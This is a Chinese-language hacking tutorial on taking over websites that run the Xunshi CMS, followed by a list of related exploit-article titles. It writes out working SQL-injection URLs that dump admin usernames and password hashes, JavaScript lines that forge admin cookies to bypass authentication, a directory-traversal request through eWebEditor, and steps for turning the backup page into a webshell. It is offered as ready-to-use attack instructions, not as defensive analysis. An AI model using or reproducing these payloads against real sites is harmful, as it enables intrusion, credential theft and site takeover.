訊時漏洞一小結(jié)

以下本文總結(jié)來自黑防去年第9期雜志上的內(nèi)容...
先說一個注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
這里一個注入
效果如圖:
這樣就很輕松可以得到管理用戶名與密碼..這里md5可以拿去破解.但是現(xiàn)在安全意識的提高.
密碼復(fù)雜了..很難破出來..那么我們可以通過后來cookies欺騙進(jìn)去
javascript:alert(document.cookie="adminuser="+escape("用戶名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
那么這里就會出現(xiàn)一種情況了..如果后臺找不到咋辦呢??請看下一漏洞讓你更輕松達(dá)到你想要的效果:
因為訊時結(jié)合了ewebeditor程序..而它沒有在處理的時候忽視了ewebeditor有個可以列目錄的漏洞
它是做了驗證的..但訊時最沒做好的地方就是驗證..我們可以通過cookies欺騙來繞過驗證.從而可以
訪問這頁面來列目錄..步驟如下:
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
效果如圖:
這樣全站目錄都能瞧了..找到后臺目錄..進(jìn)去..
那么進(jìn)了后臺怎么拿shell??上傳--備份就ok了..
那么有時候有些管理在做后臺功能的時候把備份頁面去掉了...而他本機里備份頁面還是存在的..
這個我也碰到過一次..你都可以通過列目錄來實現(xiàn)..
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/admin/admin_db_backup.asp?action=BackupData
備份ok..
那么以上兩個漏洞都被管理封住了...咋辦??上面兩個是比較常見的..那么下面一個注入漏洞呢?
在admin目錄下有個admin_lm_edit.asp頁面..里面的id沒有過濾 那么我們就可以先cookies下
然后訪問此頁面進(jìn)行注入..步驟如下:
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
然后請求admin/admin_chk.asp頁面
輸入注入語句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
效果如圖所示:
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
- SQL注入攻擊的危害性很大。在講解其防止辦法之前,數(shù)據(jù)庫管理員有必要先了解一下其攻擊的原理。這有利于管理員采取有針對性的防治措施2012-07-10
- 一直以來很多我網(wǎng)站都被植入了很多后門,這里簡單的分下黑客常用的手段,方便管理員或站長注意防御2013-01-10
訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時網(wǎng)站管理系統(tǒng)的朋友可以參考下。2011-07-15- php后門木馬對大家來說一點都不陌生吧,但是它的種類您又知多少呢2012-06-28
- 不知道各位。在上傳的時候。 有沒需要過。 一個上傳。 不修改名字。。然后上傳目錄已經(jīng)被程序所定義了。2011-04-01
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- php后臺插一句話的思路加114網(wǎng)址導(dǎo)航后臺拿webshell的方法。2011-09-29
- 現(xiàn)在很多搞web開發(fā)的人,腳本安全做得真爛,簡單而又“復(fù)雜”過濾兩下,事實上根本沒理解到真正的方法,也怪90%的腳本書上只講語法,順便鄙視下國內(nèi)那些XX磚家寫的書,不講2011-05-15
- 大家都知道,沒有一臺電腦是完全安全的,都有一個攻破點,下面小編就以實例來講解一下,一起來看看吧2016-09-01